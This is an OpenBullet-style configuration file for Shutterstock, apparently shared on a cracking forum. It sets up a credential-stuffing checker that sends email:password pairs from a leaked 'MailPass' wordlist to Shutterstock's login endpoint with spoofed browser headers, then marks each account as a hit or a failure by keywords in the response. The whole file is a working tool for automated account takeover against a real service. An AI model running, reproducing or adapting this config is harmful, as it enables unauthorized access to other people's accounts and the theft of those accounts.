[SETTINGS]
{
  "Name": "Shutterstock",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-06-19T23:28:10.2563629+02:00",
  "AdditionalInfo": "",
  "Author": "AGuyFromNULLED<3",
  "Version": "1.2.9 Anomaly",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#LOGIN REQUEST POST "https://accounts.shutterstock.com/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.shutterstock.com" 
  HEADER "Referer: https://www.shutterstock.com/fr/" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "accts_customer" 
  KEYCHAIN Failure OR 
    KEY "error text-error" 

